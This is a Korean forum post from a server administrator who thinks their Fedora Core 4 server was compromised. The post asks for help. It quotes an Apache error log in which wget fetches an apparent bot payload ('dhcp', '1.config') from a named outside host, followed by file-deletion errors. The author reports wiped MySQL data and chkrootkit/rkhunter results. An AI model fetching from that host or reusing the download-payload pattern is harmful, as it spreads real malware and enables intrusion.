해킹당한듯 합니다.

--05:44:41-- http://mansaohub.webcindario.com/bot/raw/dhcp
=> `dhcp'
Resolving mansaohub.webcindario.com... 216.66.18.50
Connecting to mansaohub.webcindario.com[216.66.18.50]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 206,432 [text/plain]

0K .......... .......... .......... .......... .......... 24% 72.85 KB/s
50K .......... .......... .......... .......... .......... 49% 258.56 KB/s
100K .......... .......... .......... .......... .......... 74% 156.04 KB/s
150K .......... .......... .......... .......... .......... 99% 273.40 KB/s
200K . 100% 15.56 MB/s

05:44:43 (145.76 KB/s) - `dhcp' saved [206,432/206,432]

--05:44:59-- http://mansaohub.webcindario.com/bot/1.config
=> `1.config'
Resolving mansaohub.webcindario.com... 216.66.18.50
Connecting to mansaohub.webcindario.com[216.66.18.50]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 770 [text/plain]

0K 100% 7.34 MB/s

05:44:59 (7.34 MB/s) - `1.config' saved [770/770]

rm: cannot remove `.//mysql.sock': Operation not permitted
rm: cannot remove `.//mapping-root': Operation not permitted
rm: cannot remove directory `.//.ICE-unix': Operation not permitted
rm: cannot remove `.//mapping-lattente': Operation not permitted
rm: cannot remove `.//.font-unix/fs7100': Operation not permitted
rm: cannot chdir from `./' to `lost+found': Permission denied

아파치 에러로그에 위와같은 로그가 남고 난 후로
MyISAM타입의 DB data 파일이 싹 날아갔네요.
MYD, MYI, frm 등등이요.
chkrootkit 만으로는 찾아지지 않아서
rkhunter도 돌려보았는데 이렇다할 결과는 없었습니다.
한가지 chkrootkit 확인결과에서 표시되지않는 프로세스가
있다고 Trojan을 의심해보라고 하더군요.
허나 rkhunter에서는 ps 등등의 명령어에는 이상이 없다 합니다.
달리 확인해볼 방법이 있는지 아니면
Linux Fedora core 4 x86_64bit 운용하고 있으신분 계시면
ps 파일 좀 보내주실 수 있는지, 답변부탁드립니다.